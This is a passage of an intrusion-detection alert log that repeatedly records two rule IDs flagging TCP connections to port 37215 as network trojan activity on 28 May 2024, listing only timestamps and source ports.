            Timestamp:05/28/24-09:56:38.473805
            SID:2835222
            Source Port:41626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045873
            SID:2829579
            Source Port:33088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875094
            SID:2835222
            Source Port:54950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999994
            SID:2829579
            Source Port:53758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965245
            SID:2835222
            Source Port:42678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310488
            SID:2835222
            Source Port:39096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533187
            SID:2829579
            Source Port:54878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.153230
            SID:2835222
            Source Port:41900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350405
            SID:2835222
            Source Port:35458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251121
            SID:2835222
            Source Port:37112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849233
            SID:2829579
            Source Port:44592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923071
            SID:2835222
            Source Port:53742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756109
            SID:2835222
            Source Port:55638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776269
            SID:2829579
            Source Port:36934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842930
            SID:2835222
            Source Port:50936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500228
            SID:2829579
            Source Port:49960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961132
            SID:2829579
            Source Port:47344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.630997
            SID:2835222
            Source Port:37950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892293
            SID:2829579
            Source Port:53726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.849819
            SID:2829579
            Source Port:52678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065037
            SID:2829579
            Source Port:39726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.738070
            SID:2829579
            Source Port:58168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.823336
            SID:2835222
            Source Port:46368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778394
            SID:2835222
            Source Port:51036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861992
            SID:2835222
            Source Port:36306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.051921
            SID:2829579
            Source Port:56254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.050520
            SID:2829579
            Source Port:42838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894327
            SID:2835222
            Source Port:51950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.063480
            SID:2835222
            Source Port:54542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.676513
            SID:2835222
            Source Port:47128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.691686
            SID:2829579
            Source Port:43990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.699219
            SID:2829579
            Source Port:51620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321316
            SID:2829579
            Source Port:33356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.294681
            SID:2835222
            Source Port:52356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765165
            SID:2829579
            Source Port:49542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851130
            SID:2835222
            Source Port:38382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020644
            SID:2829579
            Source Port:45002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777319
            SID:2829579
            Source Port:54990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.916086
            SID:2835222
            Source Port:38542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840255
            SID:2829579
            Source Port:42138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881211
            SID:2829579
            Source Port:36104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.741511
            SID:2835222
            Source Port:40458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734804
            SID:2835222
            Source Port:42496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575822
            SID:2835222
            Source Port:33662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755829
            SID:2829579
            Source Port:34424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909015
            SID:2835222
            Source Port:55806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899622
            SID:2835222
            Source Port:51816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765246
            SID:2829579
            Source Port:59206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930662
            SID:2829579
            Source Port:41322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.523657
            SID:2829579
            Source Port:37796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506957
            SID:2835222
            Source Port:57650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047766
            SID:2835222
            Source Port:40312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669595
            SID:2835222
            Source Port:55478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321768
            SID:2829579
            Source Port:59134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.413932
            SID:2829579
            Source Port:33992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459522
            SID:2829579
            Source Port:49690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893082
            SID:2835222
            Source Port:44204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326779
            SID:2829579
            Source Port:41814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.569423
            SID:2835222
            Source Port:44696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077976
            SID:2829579
            Source Port:34588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811996
            SID:2829579
            Source Port:40386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.738671
            SID:2829579
            Source Port:40664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862998
            SID:2829579
            Source Port:39532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854776
            SID:2829579
            Source Port:36092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793661
            SID:2835222
            Source Port:39194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290830
            SID:2829579
            Source Port:38792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.011134
            SID:2829579
            Source Port:51806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808248
            SID:2835222
            Source Port:45050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.601910
            SID:2829579
            Source Port:37012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843958
            SID:2835222
            Source Port:39876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839570
            SID:2835222
            Source Port:59400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031355
            SID:2829579
            Source Port:54448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986164
            SID:2829579
            Source Port:38724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837475
            SID:2829579
            Source Port:33130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834003
            SID:2829579
            Source Port:35144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299245
            SID:2829579
            Source Port:57170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843136
            SID:2835222
            Source Port:38438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180696
            SID:2835222
            Source Port:48580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957018
            SID:2829579
            Source Port:45830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847798
            SID:2835222
            Source Port:51772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909891
            SID:2829579
            Source Port:48886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691721
            SID:2835222
            Source Port:46514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879776
            SID:2835222
            Source Port:40400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712976
            SID:2829579
            Source Port:38462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946229
            SID:2835222
            Source Port:34156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312754
            SID:2835222
            Source Port:48594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930016
            SID:2835222
            Source Port:60758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877626
            SID:2829579
            Source Port:35510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764665
            SID:2835222
            Source Port:35740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001014
            SID:2835222
            Source Port:36426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880290
            SID:2835222
            Source Port:43690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837077
            SID:2835222
            Source Port:33262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.445949
            SID:2829579
            Source Port:42476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.541429
            SID:2835222
            Source Port:38556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.656974
            SID:2835222
            Source Port:33146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507151
            SID:2829579
            Source Port:44422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957616
            SID:2835222
            Source Port:47900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.716144
            SID:2835222
            Source Port:37752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852881
            SID:2835222
            Source Port:39792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697228
            SID:2835222
            Source Port:58120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885453
            SID:2829579
            Source Port:50142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.476264
            SID:2829579
            Source Port:49294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922183
            SID:2835222
            Source Port:40990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.384799
            SID:2835222
            Source Port:51424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790470
            SID:2829579
            Source Port:43504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834414
            SID:2829579
            Source Port:47224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766830
            SID:2835222
            Source Port:34856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.975241
            SID:2835222
            Source Port:45720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848454
            SID:2829579
            Source Port:51256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543284
            SID:2829579
            Source Port:44250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712039
            SID:2835222
            Source Port:53094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000017
            SID:2829579
            Source Port:43990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737314
            SID:2835222
            Source Port:46344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.925029
            SID:2835222
            Source Port:38520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777392
            SID:2835222
            Source Port:40888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.753176
            SID:2829579
            Source Port:35472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.627648
            SID:2829579
            Source Port:54496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818680
            SID:2829579
            Source Port:33296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850569
            SID:2829579
            Source Port:60064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885472
            SID:2829579
            Source Port:57750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771339
            SID:2829579
            Source Port:49448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954230
            SID:2829579
            Source Port:50486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911386
            SID:2829579
            Source Port:55056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.339988
            SID:2835222
            Source Port:60708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.698245
            SID:2829579
            Source Port:35338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869534
            SID:2835222
            Source Port:37728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943615
            SID:2829579
            Source Port:52970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757354
            SID:2835222
            Source Port:52744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771265
            SID:2829579
            Source Port:35878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893241
            SID:2829579
            Source Port:48534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.910429
            SID:2829579
            Source Port:35224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.319125
            SID:2829579
            Source Port:50890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453104
            SID:2835222
            Source Port:53310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.583376
            SID:2829579
            Source Port:34118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290532
            SID:2829579
            Source Port:40224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777511
            SID:2829579
            Source Port:52214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.966794
            SID:2829579
            Source Port:41980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.398558
            SID:2835222
            Source Port:37706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321095
            SID:2835222
            Source Port:52128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953847
            SID:2835222
            Source Port:48766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371492
            SID:2835222
            Source Port:47266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.152893
            SID:2835222
            Source Port:54978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368198
            SID:2835222
            Source Port:34044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.051520
            SID:2829579
            Source Port:42636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984696
            SID:2835222
            Source Port:38354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046077
            SID:2835222
            Source Port:60650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.544608
            SID:2829579
            Source Port:53518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.925264
            SID:2829579
            Source Port:51586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.812032
            SID:2829579
            Source Port:39056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939077
            SID:2829579
            Source Port:46370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309613
            SID:2829579
            Source Port:51592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847763
            SID:2835222
            Source Port:58978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998427
            SID:2829579
            Source Port:34298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326904
            SID:2835222
            Source Port:48140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059065
            SID:2835222
            Source Port:34618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491386
            SID:2829579
            Source Port:38678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878723
            SID:2835222
            Source Port:46588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.898916
            SID:2829579
            Source Port:37434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453857
            SID:2829579
            Source Port:40190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753448
            SID:2835222
            Source Port:43376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473289
            SID:2835222
            Source Port:52622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.446369
            SID:2829579
            Source Port:47360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915194
            SID:2829579
            Source Port:48676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.574191
            SID:2835222
            Source Port:34962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.553722
            SID:2829579
            Source Port:44242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.945415
            SID:2835222
            Source Port:59412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928697
            SID:2835222
            Source Port:60366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810386
            SID:2835222
            Source Port:54966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057773
            SID:2829579
            Source Port:59018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765735
            SID:2829579
            Source Port:59812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.070213
            SID:2829579
            Source Port:36750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.729017
            SID:2829579
            Source Port:44938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855673
            SID:2829579
            Source Port:53842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002982
            SID:2829579
            Source Port:44570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.648532
            SID:2829579
            Source Port:41418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865977
            SID:2829579
            Source Port:48156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.508187
            SID:2829579
            Source Port:49694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737176
            SID:2829579
            Source Port:46014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532626
            SID:2835222
            Source Port:45788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863849
            SID:2829579
            Source Port:53944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012151
            SID:2835222
            Source Port:34314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.382605
            SID:2829579
            Source Port:39948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507578
            SID:2835222
            Source Port:37062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516575
            SID:2829579
            Source Port:56114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.546001
            SID:2829579
            Source Port:39404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.294641
            SID:2835222
            Source Port:38280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654503
            SID:2829579
            Source Port:53858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612172
            SID:2835222
            Source Port:49548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544334
            SID:2835222
            Source Port:41906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953144
            SID:2829579
            Source Port:55644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767194
            SID:2829579
            Source Port:33986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892742
            SID:2829579
            Source Port:60346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045851
            SID:2835222
            Source Port:45706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290434
            SID:2829579
            Source Port:40066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919426
            SID:2835222
            Source Port:33696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810707
            SID:2835222
            Source Port:59144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.926978
            SID:2829579
            Source Port:47378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330981
